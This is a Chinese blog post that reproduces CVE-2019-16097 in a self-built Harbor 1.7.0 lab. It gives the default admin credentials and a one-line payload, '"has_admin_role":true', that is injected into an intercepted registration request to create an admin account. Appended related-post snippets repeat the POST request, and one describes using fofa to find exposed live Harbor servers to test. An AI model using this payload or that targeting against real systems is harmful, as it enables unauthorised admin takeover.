CVE-2019-16097复现-harbor注册提权

已于 2022-03-02 09:51:07 修改
阅读量5k 收藏
点赞数
文章标签: CVE-2019-16097 Harbor 注册提权 漏洞复现 安全分析
于 2021-11-05 14:34:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_47604261/article/details/121161441
版权

CVE-2019-16097复现-harbor注册提权

1. 环境

nginx
centos 7
harbor 1.7.0
docker

下载地址 v1.7.0
在这里插入图片描述
一开始我下载下面的安装不上上面的才是离线安装

nginx 中间件
关闭systemctl stop apache

安装nginx
nginx配置资料
配置源
sudo yum install -y epel-release
sudo yum -y update
nginx安装
sudo yum install -y nginx
暂时不要开启nginx
检查80
netstat -anp |grep :80

要有docker 环境
时间太久我忘了怎么装了在这里插入图片描述
解压harbor
tar -zxvf tar -zxvf harbor-offline-installer-v1.7.0.tgz

在这里插入图片描述
cd harbor
vim 配置文件
在这里插入图片描述
vim harbor.cfg
在这里插入图片描述
改为本机ip
安装
./install.sh
在这里插入图片描述
启动环境
docker-compose start
在这里插入图片描述
访问自己ip
在这里插入图片描述
管理员
账号:admin
密码:Harbor12345

2.复现
注册账号
在这里插入图片描述在这里插入图片描述

截断
在这里插入图片描述

POC

"has_admin_role":true

登录
在这里插入图片描述
上面写的是管理员
3.分析
我看到的分析文章虽然我不是很懂,那是什么代码,大概前端没有发送has_admin_role参数,但是有接收,接收之后把用户写入数据库造成的提权
在这里插入图片描述

果汁天下苏
关注
CVE-2019-8449:针对Jira v2.1的CVE-2019-8449漏洞-v8.3.4
03-08
CVE-2019-8449 低于v8.3.4的Jira版本的CVE-2019-8449 Exploit CVSS得分: 5.0 漏洞类型:信息泄露身份验证:不需要受影响的版本: 2.1-8.3.4 发布日期: 2019-09-11 漏洞数据库: : 描述版本8.4.0之前的Jira中的/ ...
CVE-2019-16097Harbor任意管理员注册漏洞复现
Sylon的博客
10-10 1132
0x00 Harbor简介 Harbor是一个用于存储和分发Docker镜像的企业级Registry服务器,通过添加一些企业必需的功能特性,例如安全、标识和管理等,扩展了开源Docker Distribution。 作为一个企业级私有Registry服务器,Harbor提供了更好的性能和安全。提升用户使用Registry构建和运行环境传输镜像的效率。 0x01 原理概述 该漏...
探索Harbor:云原生时代的开源注册
最新发布
gitblog_00522的博客
08-07 427
探索Harbor:云原生时代的开源注册harborHarbor 是一个开源的容器镜像仓库,用于存储和管理 Docker 镜像和其他容器镜像。 * 容器镜像仓库、存储和管理 Docker 镜像和其他容器镜像 * 有什么特点:支持多种镜像格式、易于使用、安全性和访问控制项目地址:https://gitcode.com/gh_mirrors/ha/harbor 在云原生技术的浪潮中,Harbo...
CVE-2019-16097 || Harbor任意管理员注册漏洞复现
Summer's blog
05-13 3751
目录 0x01 前言 0x02 漏洞简介及危害 0x03 漏洞复现 0x04 修复建议 #0x01 前言 Harbor是一个用于存储和分发Docker镜像的企业级Registry服务器,通过添加一些企业必需的功能特性,例如安全、标识和管理等,扩展了开源Docker Distribution。作为一个企业级私有Registry服务器,Harbor提供了更好的性能和安全...
Harbor任意管理员注册漏洞(CVE-2019-16097)复现
test\\的博客
10-13 1391
Harbor任意管理员注册漏洞复现 fhh# 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博...
harbor注册功能逻辑漏洞
Websec
07-15 4979
一、漏洞介绍 此漏洞属于一个严重的权限提升漏洞,该漏洞使任何人都可以在其默认设置下获得管理员权限。 该漏洞已分配给CVE-2019-16097,已于9月10日公开。 Harbor是一个开源的云原生注册表,用于存储,签名和扫描图像以查找漏洞。 Harbor与Docker Hub,Docker Registry,Google Container Registry和其他注册表集成。 它提供了一个简单的GUI,允许用户根据其权限下载,上传和扫描图像。 二、影响版本 Harbor 1.7.0版本至1.8
Python——for,while循环
zy010101博客
03-08 477
循环是程序设计语言中非常重要的语法。有了循环,我们就能处理重复事件。下面的代码说明了for循环的基本流程。 num_list = [5,2,4,7,3,6,8,1,9,0] num_list.sort() for num in num_list: # 每次循环,num都会获得num_list中的下一个元素,直到遍历完num_list为止。 print(num) # 循环执行print(num)来进行打印 程序执行结果如下所示: 注意到for循环之后有个冒号,..
docker容器内的恶意提权
niwoxiangyu的博客
10-17 122
使用docker in docker 运行一个带有docker二进制文件且挂载了/root/.docker/config.json和/var/run/docker.sock的容器就可以对任意项目任意镜像进行pull\push操作。同时/root/.docker/config.json内harbor的密码是明文的用户名+密码转base64得到的。docker容器内的恶意提权
harbor安装_Harbor任意管理员注册漏洞(CVE-2019-1609) (附:批量利用poc)
weixin_39997664的博客
11-30 860
一、漏洞介绍此漏洞属于一个严重的权限提升漏洞,该漏洞使任何人都可以在其默认设置下获得管理员权限。该漏洞已分配给CVE-2019-16097,已于9月10日公开。Harbor是一个开源的云原生注册表,用于存储,签名和扫描图像以查找漏洞。Harbor与Docker Hub,Docker Registry,Google Container Registry和其他注册表集成。它提供了一个简单的GUI,允许...
Harbor任意管理员注册漏洞复现CVE-2019-16097
ddr12231的博客
09-21 270
注册时抓包 添加poc "has_admin_role":true 管理员权限 POC POST /api/users HTTP/1.1 Host: 127.0.0.1 Content-Length: 131 Accept: application/json Origin: http://127.0.0.1 User-Agent: Opera/9.80 (Windows NT 6....
Harbor未授权创建管理员漏洞(CVE-2019-16097)
sojrs_sec的博客
09-30 2056
环境准备 fofa搜索环境 title="Harbor" && country=CN 找到一个可用环境测试 测试 注册账号,填写账号信息后抓包 POST /api/users HTTP/1.1 Host: 1.1.1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/201001...
Docker Harbor | 私有仓库 | 用户登录 |用户创建
m0_75015568的博客
04-25 1492
Docker Harbor | 私有仓库 | 用户登录 |用户创建
提升权限_【预警通告】Harbor权限提升漏洞安全预警通告
weixin_36027743的博客
01-12 371
点击箭头处“蓝色字”,关注我们哦!!尊敬的客户:Harbor是一款开源的可信云镜像仓库。主要用于镜像上传、更新、存储和维护。常用于与CI/CD配合管理Docker镜像。Harbor 1.7.6之前版本和Harbor 1.8.3之前版本中的core/api/user.go文件存在安全漏洞。若开放注册功能,攻击者可利用该漏洞创建admin账户。奇安信安全监测与响应中心将持续关注该漏洞进展,并...
Harbor未授权访问漏洞(CVE-2022-46463)
m0_49025459的博客
04-29 7577
是为企业用户设计的容器镜像仓库开源项目,包括了权限管理(RBAC)、LDAP、审计、安全漏洞扫描、镜像验真、管理界面、自我注册、HA等企业必需的功能,同时针对中国用户的特点,设计镜像复制和中文支持等功能。
利用POC检测WebLogic反序列化漏洞CVE-2019-2725
2019年,Oracle WebLogic服务器遭遇了一个严重的反序列化漏洞,即CVE-2019-2725。这个漏洞允许攻击者通过精心构造的恶意请求,利用WebLogic应用程序中的序列化功能来执行任意代码,从而获取系统控制权限。由于其...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值